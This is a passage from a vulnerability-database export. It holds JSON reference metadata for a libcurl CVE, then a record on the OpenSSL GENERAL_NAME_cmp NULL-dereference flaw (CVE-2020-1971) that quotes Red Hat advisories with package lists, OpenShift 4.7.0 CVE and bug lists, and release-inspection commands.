        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36242"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27783"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25659"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27783"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3528"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25678"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25678"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25736"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3450"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2130"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/windows_containers/window"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25736"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3449"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2532"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13949"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13949"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2705"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1813"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1840"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1814"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1820"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1739"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1815"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1828"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1809"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1817"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7463"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8037"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1784"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/downloads/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1846"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1841"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1843"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1810"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1825"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1811"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1826"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1832"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/ht212325."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1824"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1839"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1834"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1829"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1740"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1808"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33195"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33197"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33195"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33198"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33198"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-34558"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3556"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33197"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3421"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3703"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186411"
      },
      {
        "db": "PACKETSTORM",
        "id": "163747"
      },
      {
        "db": "PACKETSTORM",
        "id": "162837"
      },
      {
        "db": "PACKETSTORM",
        "id": "163209"
      },
      {
        "db": "PACKETSTORM",
        "id": "163257"
      },
      {
        "db": "PACKETSTORM",
        "id": "163267"
      },
      {
        "db": "PACKETSTORM",
        "id": "163276"
      },
      {
        "db": "PACKETSTORM",
        "id": "163496"
      },
      {
        "db": "PACKETSTORM",
        "id": "162358"
      },
      {
        "db": "PACKETSTORM",
        "id": "164192"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-755"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8286"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-186411",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163747",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "162837",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163209",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163257",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163267",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163276",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163496",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "162358",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "164192",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-755",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8286",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2020-12-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-186411",
        "ident": null
      },
      {
        "date": "2021-08-06T14:02:37",
        "db": "PACKETSTORM",
        "id": "163747",
        "ident": null
      },
      {
        "date": "2021-05-27T13:28:54",
        "db": "PACKETSTORM",
        "id": "162837",
        "ident": null
      },
      {
        "date": "2021-06-17T18:34:10",
        "db": "PACKETSTORM",
        "id": "163209",
        "ident": null
      },
      {
        "date": "2021-06-23T15:44:15",
        "db": "PACKETSTORM",
        "id": "163257",
        "ident": null
      },
      {
        "date": "2021-06-23T16:08:25",
        "db": "PACKETSTORM",
        "id": "163267",
        "ident": null
      },
      {
        "date": "2021-06-24T17:54:53",
        "db": "PACKETSTORM",
        "id": "163276",
        "ident": null
      },
      {
        "date": "2021-07-14T15:02:07",
        "db": "PACKETSTORM",
        "id": "163496",
        "ident": null
      },
      {
        "date": "2021-04-28T14:55:56",
        "db": "PACKETSTORM",
        "id": "162358",
        "ident": null
      },
      {
        "date": "2021-09-17T16:04:56",
        "db": "PACKETSTORM",
        "id": "164192",
        "ident": null
      },
      {
        "date": "2020-12-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-755",
        "ident": null
      },
      {
        "date": "2020-12-14T20:15:14.043000",
        "db": "NVD",
        "id": "CVE-2020-8286",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2022-05-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-186411",
        "ident": null
      },
      {
        "date": "2023-06-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-755",
        "ident": null
      },
      {
        "date": "2024-11-21T05:38:39.643000",
        "db": "NVD",
        "id": "CVE-2020-8286",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-755"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "_id": null,
    "data": "HAXX libcurl Trust Management Issue Vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-755"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "_id": null,
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-755"
      }
    ],
    "trust": 0.6
  }
}

VAR-202012-1527

Vulnerability from variot - Updated: 2026-04-10 22:40

The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w). The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc.

Security Fix(es):

cluster-ingress-operator: changes to loadBalancerSourceRanges overwritten by operator (CVE-2020-27836)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. This could prevent installations to flavors detected as baremetal, which might have the required capacity to complete the installation. This is usually caused by OpenStack administrators not setting the appropriate metadata on their bare metal flavors. Validations are now skipped on flavors detected as baremetal, to prevent incorrect failures from being reported. (BZ#1889416)

Previously, there was a broken link on the OperatorHub install page of the web console, which was intended to reference the cluster monitoring documentation. Bugs fixed (https://bugzilla.redhat.com/):

1885442 - Console doesn't load in iOS Safari when using self-signed certificates 1885946 - console-master-e2e-gcp-console test periodically fail due to no Alerts found 1887551 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console 1888165 - [release 4.6] IO doesn't recognize namespaces - 2 resources with the same name in 2 namespaces -> only 1 gets collected 1888650 - Fix CVE-2015-7501 affecting agent-maven-3.5 1888717 - Cypress: Fix 'link-name' accesibility violation 1888721 - ovn-masters stuck in crashloop after scale test 1890993 - Selected Capacity is showing wrong size 1890994 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off 1891427 - CLI does not save login credentials as expected when using the same username in multiple clusters 1891454 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName 1891499 - Other machine config pools do not show during update 1891891 - Wrong detail head on network policy detail page. Relevant releases/architectures:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server EUS (v. 7.7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 7.7) - ppc64, ppc64le, s390x, x86_64

Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted. Package List:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.7):

Source: openssl-1.0.2k-20.el7_7.src.rpm

x86_64: openssl-1.0.2k-20.el7_7.x86_64.rpm openssl-debuginfo-1.0.2k-20.el7_7.i686.rpm openssl-debuginfo-1.0.2k-20.el7_7.x86_64.rpm openssl-libs-1.0.2k-20.el7_7.i686.rpm openssl-libs-1.0.2k-20.el7_7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.7):

x86_64: openssl-debuginfo-1.0.2k-20.el7_7.i686.rpm openssl-debuginfo-1.0.2k-20.el7_7.x86_64.rpm openssl-devel-1.0.2k-20.el7_7.i686.rpm openssl-devel-1.0.2k-20.el7_7.x86_64.rpm openssl-perl-1.0.2k-20.el7_7.x86_64.rpm openssl-static-1.0.2k-20.el7_7.i686.rpm openssl-static-1.0.2k-20.el7_7.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 7.7):

Source: openssl-1.0.2k-20.el7_7.src.rpm

ppc64: openssl-1.0.2k-20.el7_7.ppc64.rpm openssl-debuginfo-1.0.2k-20.el7_7.ppc.rpm openssl-debuginfo-1.0.2k-20.el7_7.ppc64.rpm openssl-devel-1.0.2k-20.el7_7.ppc.rpm openssl-devel-1.0.2k-20.el7_7.ppc64.rpm openssl-libs-1.0.2k-20.el7_7.ppc.rpm openssl-libs-1.0.2k-20.el7_7.ppc64.rpm

ppc64le: openssl-1.0.2k-20.el7_7.ppc64le.rpm openssl-debuginfo-1.0.2k-20.el7_7.ppc64le.rpm openssl-devel-1.0.2k-20.el7_7.ppc64le.rpm openssl-libs-1.0.2k-20.el7_7.ppc64le.rpm

s390x: openssl-1.0.2k-20.el7_7.s390x.rpm openssl-debuginfo-1.0.2k-20.el7_7.s390.rpm openssl-debuginfo-1.0.2k-20.el7_7.s390x.rpm openssl-devel-1.0.2k-20.el7_7.s390.rpm openssl-devel-1.0.2k-20.el7_7.s390x.rpm openssl-libs-1.0.2k-20.el7_7.s390.rpm openssl-libs-1.0.2k-20.el7_7.s390x.rpm

x86_64: openssl-1.0.2k-20.el7_7.x86_64.rpm openssl-debuginfo-1.0.2k-20.el7_7.i686.rpm openssl-debuginfo-1.0.2k-20.el7_7.x86_64.rpm openssl-devel-1.0.2k-20.el7_7.i686.rpm openssl-devel-1.0.2k-20.el7_7.x86_64.rpm openssl-libs-1.0.2k-20.el7_7.i686.rpm openssl-libs-1.0.2k-20.el7_7.x86_64.rpm

Red Hat Enterprise Linux Server Optional EUS (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: OpenShift Container Platform 4.7.0 security, bug fix, and enhancement update Advisory ID: RHSA-2020:5633-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2020:5633 Issue date: 2021-02-24 CVE Names: CVE-2018-10103 CVE-2018-10105 CVE-2018-14461 CVE-2018-14462 CVE-2018-14463 CVE-2018-14464 CVE-2018-14465 CVE-2018-14466 CVE-2018-14467 CVE-2018-14468 CVE-2018-14469 CVE-2018-14470 CVE-2018-14553 CVE-2018-14879 CVE-2018-14880 CVE-2018-14881 CVE-2018-14882 CVE-2018-16227 CVE-2018-16228 CVE-2018-16229 CVE-2018-16230 CVE-2018-16300 CVE-2018-16451 CVE-2018-16452 CVE-2018-20843 CVE-2019-3884 CVE-2019-5018 CVE-2019-6977 CVE-2019-6978 CVE-2019-8625 CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 CVE-2019-8846 CVE-2019-9455 CVE-2019-9458 CVE-2019-11068 CVE-2019-12614 CVE-2019-13050 CVE-2019-13225 CVE-2019-13627 CVE-2019-14889 CVE-2019-15165 CVE-2019-15166 CVE-2019-15903 CVE-2019-15917 CVE-2019-15925 CVE-2019-16167 CVE-2019-16168 CVE-2019-16231 CVE-2019-16233 CVE-2019-16935 CVE-2019-17450 CVE-2019-17546 CVE-2019-18197 CVE-2019-18808 CVE-2019-18809 CVE-2019-19046 CVE-2019-19056 CVE-2019-19062 CVE-2019-19063 CVE-2019-19068 CVE-2019-19072 CVE-2019-19221 CVE-2019-19319 CVE-2019-19332 CVE-2019-19447 CVE-2019-19524 CVE-2019-19533 CVE-2019-19537 CVE-2019-19543 CVE-2019-19602 CVE-2019-19767 CVE-2019-19770 CVE-2019-19906 CVE-2019-19956 CVE-2019-20054 CVE-2019-20218 CVE-2019-20386 CVE-2019-20387 CVE-2019-20388 CVE-2019-20454 CVE-2019-20636 CVE-2019-20807 CVE-2019-20812 CVE-2019-20907 CVE-2019-20916 CVE-2020-0305 CVE-2020-0444 CVE-2020-1716 CVE-2020-1730 CVE-2020-1751 CVE-2020-1752 CVE-2020-1971 CVE-2020-2574 CVE-2020-2752 CVE-2020-2922 CVE-2020-3862 CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 CVE-2020-3897 CVE-2020-3898 CVE-2020-3899 CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 CVE-2020-6405 CVE-2020-7595 CVE-2020-7774 CVE-2020-8177 CVE-2020-8492 CVE-2020-8563 CVE-2020-8566 CVE-2020-8619 CVE-2020-8622 CVE-2020-8623 CVE-2020-8624 CVE-2020-8647 CVE-2020-8648 CVE-2020-8649 CVE-2020-9327 CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 CVE-2020-9925 CVE-2020-10018 CVE-2020-10029 CVE-2020-10732 CVE-2020-10749 CVE-2020-10751 CVE-2020-10763 CVE-2020-10773 CVE-2020-10774 CVE-2020-10942 CVE-2020-11565 CVE-2020-11668 CVE-2020-11793 CVE-2020-12465 CVE-2020-12655 CVE-2020-12659 CVE-2020-12770 CVE-2020-12826 CVE-2020-13249 CVE-2020-13630 CVE-2020-13631 CVE-2020-13632 CVE-2020-14019 CVE-2020-14040 CVE-2020-14381 CVE-2020-14382 CVE-2020-14391 CVE-2020-14422 CVE-2020-15157 CVE-2020-15503 CVE-2020-15862 CVE-2020-15999 CVE-2020-16166 CVE-2020-24490 CVE-2020-24659 CVE-2020-25211 CVE-2020-25641 CVE-2020-25658 CVE-2020-25661 CVE-2020-25662 CVE-2020-25681 CVE-2020-25682 CVE-2020-25683 CVE-2020-25684 CVE-2020-25685 CVE-2020-25686 CVE-2020-25687 CVE-2020-25694 CVE-2020-25696 CVE-2020-26160 CVE-2020-27813 CVE-2020-27846 CVE-2020-28362 CVE-2020-29652 CVE-2021-2007 CVE-2021-3121 =====================================================================

Summary:

Red Hat OpenShift Container Platform release 4.7.0 is now available.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.0. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2020:5634

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

You may download the oc tool and use it to inspect release image metadata as follows:

(For x86_64 architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-x86_64

The image digest is sha256:d74b1cfa81f8c9cc23336aee72d8ae9c9905e62c4874b071317a078c316f8a70

(For s390x architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-s390x

The image digest is sha256:a68ca03d87496ddfea0ac26b82af77231583a58a7836b95de85efe5e390ad45d

(For ppc64le architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-ppc64le

The image digest is sha256:bc7b04e038c8ff3a33b827f4ee19aa79b26e14c359a7dcc1ced9f3b58e5f1ac6

All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor.

Security Fix(es):

crewjam/saml: authentication bypass in saml authentication (CVE-2020-27846)
golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference (CVE-2020-29652)
gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)
nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)
kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider (CVE-2020-8563)
containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters (CVE-2020-10749)
heketi: gluster-block volume password details available in logs (CVE-2020-10763)
golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)
jwt-go: access restriction bypass vulnerability (CVE-2020-26160)
golang-github-gorilla-websocket: integer overflow leads to denial of service (CVE-2020-27813)
golang: math/big: panic during recursive division of very large numbers (CVE-2020-28362)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

For OpenShift Container Platform 4.7, see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html.

Bugs fixed (https://bugzilla.redhat.com/):

1620608 - Restoring deployment config with history leads to weird state 1752220 - [OVN] Network Policy fails to work when project label gets overwritten 1756096 - Local storage operator should implement must-gather spec 1756173 - /etc/udev/rules.d/66-azure-storage.rules missing from initramfs 1768255 - installer reports 100% complete but failing components 1770017 - Init containers restart when the exited container is removed from node. 1775057 - [MSTR-485] Cluster is abnormal after etcd backup/restore when the backup is conducted during etcd encryption is migrating 1775444 - RFE: k8s cpu manager does not restrict /usr/bin/pod cpuset 1777038 - Cluster scaled beyond host subnet limits does not fire alert or cleanly report why it cannot scale 1777224 - InfraID in metadata.json and .openshift_install_state.json is not consistent when repeating create commands 1784298 - "Displaying with reduced resolution due to large dataset." would show under some conditions 1785399 - Under condition of heavy pod creation, creation fails with 'error reserving pod name ...: name is reserved" 1797766 - Resource Requirements" specDescriptor fields - CPU and Memory injects empty string YAML editor 1801089 - [OVN] Installation failed and monitoring pod not created due to some network error. 1805025 - [OSP] Machine status doesn't become "Failed" when creating a machine with invalid image 1805639 - Machine status should be "Failed" when creating a machine with invalid machine configuration 1806000 - CRI-O failing with: error reserving ctr name 1806915 - openshift-service-ca: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be 1806917 - openshift-service-ca-operator: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be 1810438 - Installation logs are not gathered from OCP nodes 1812085 - kubernetes-networking-namespace-pods dashboard doesn't exist 1812412 - Monitoring Dashboard: on restricted cluster, query timed out in expression evaluation 1813012 - EtcdDiscoveryDomain no longer needed 1813949 - openshift-install doesn't use env variables for OS_* for some of API endpoints 1816812 - OpenShift test suites are not resilient to rate limited registries (like docker.io) and cannot control their dependencies for offline use 1819053 - loading OpenAPI spec for "v1beta1.metrics.k8s.io" failed with: OpenAPI spec does not exist 1819457 - Package Server is in 'Cannot update' status despite properly working 1820141 - [RFE] deploy qemu-quest-agent on the nodes 1822744 - OCS Installation CI test flaking 1824038 - Integration Tests: StaleElementReferenceError in OLM single-installmode scenario 1825892 - StorageClasses and PVs are not cleaned completely after running the csi verification tool 1826301 - Wrong NodeStatus reports in file-integrity scan when configuration error in aide.conf file 1829723 - User workload monitoring alerts fire out of the box 1832968 - oc adm catalog mirror does not mirror the index image itself 1833012 - Lower OVNKubernetes HTTP E/W performance compared with OpenShiftSDN 1833220 - CVE-2020-10749 containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters 1834995 - olmFull suite always fails once th suite is run on the same cluster 1836017 - vSphere UPI: Both Internal and External load balancers for kube-apiserver should use /readyz 1837953 - Replacing masters doesn't work for ovn-kubernetes 4.4 1838352 - OperatorExited, Pending marketplace-operator-... pod for several weeks 1838751 - [oVirt][Tracker] Re-enable skipped network tests 1839239 - csi-snapshot-controller flickers Degraded=True on etcd hiccups 1840759 - [aws-ebs-csi-driver] The volume created by aws ebs csi driver can not be deleted when the cluster is destroyed 1841039 - authentication-operator: Add e2e test for password grants to Keycloak being set as OIDC IdP 1841119 - Get rid of config patches and pass flags directly to kcm 1841175 - When an Install Plan gets deleted, OLM does not create a new one 1841381 - Issue with memoryMB validation 1841885 - oc adm catalog mirror command attempts to pull from registry.redhat.io when using --from-dir option 1844727 - Etcd container leaves grep and lsof zombie processes 1845387 - CVE-2020-10763 heketi: gluster-block volume password details available in logs 1847074 - Filter bar layout issues at some screen widths on search page 1848358 - CRDs with preserveUnknownFields:true don't reflect in status that they are non-structural 1849543 - [4.5]kubeletconfig's description will show multiple lines for finalizers when upgrade from 4.4.8->4.5 1851103 - Use of NetworkManager-wait-online.service in rhcos-growpart.service 1851203 - [GSS] [RFE] Need a simpler representation of capactiy breakdown in total usage and per project breakdown in OCS 4 dashboard 1851351 - OCP 4.4.9: EtcdMemberIPMigratorDegraded: rpc error: code = Canceled desc = grpc: the client connection is closing 1851693 - The oc apply should return errors instead of hanging there when failing to create the CRD 1852289 - Upgrade testsuite fails on ppc64le environment - Unsupported LoadBalancer service 1853115 - the restriction of --cloud option should be shown in help text. 1853116 - --to option does not work with --credentials-requests flag. 1853352 - [v2v][UI] Storage Class fields Should Not be empty in VM disks view 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1854567 - "Installed Operators" list showing "duplicated" entries during installation 1855325 - [Feature:Prometheus][Conformance] Prometheus when installed on the cluster [Top Level] [Feature:Prometheus][Conformance] Prometheus when installed on the cluster should report telemetry if a cloud.openshift.com token is present 1855351 - Inconsistent Installer reactions to Ctrl-C during user input process 1855408 - OVN cluster unstable after running minimal scale test 1856351 - Build page should show metrics for when the build ran, not the last 30 minutes 1856354 - New APIServices missing from OpenAPI definitions 1857446 - ARO/Azure: excessive pod memory allocation causes node lockup 1857877 - Operator upgrades can delete existing CSV before completion 1858578 - [v2v] [ui] VM import RHV to CNV Target VM Name longer than 63 chars should not be allowed 1859174 - [IPI][OSP] Having errors from 4.3 to 4.6 about Security group rule already created 1860136 - default ingress does not propagate annotations to route object on update 1860322 - [OCPv4.5.2] after unexpected shutdown one of RHV Hypervisors, OCP worker nodes machine are marked as "Failed" 1860518 - unable to stop a crio pod 1861383 - Route with haproxy.router.openshift.io/timeout: 365d kills the ingress controller 1862430 - LSO: PV creation lock should not be acquired in a loop 1862489 - LSO autoprovisioning should exclude top level disks that are part of LVM volume group. 1862608 - Virtual media does not work on hosts using BIOS, only UEFI 1862918 - [v2v] User should only select SRIOV network when importin vm with SRIOV network 1865743 - Some pods are stuck in ContainerCreating and some sdn pods are in CrashLoopBackOff 1865839 - rpm-ostree fails with "System transaction in progress" when moving to kernel-rt 1866043 - Configurable table column headers can be illegible 1866087 - Examining agones helm chart resources results in "Oh no!" 1866261 - Need to indicate the intentional behavior for Ansible in the create api help info 1866298 - [RHOCS Usability Study][Installation] 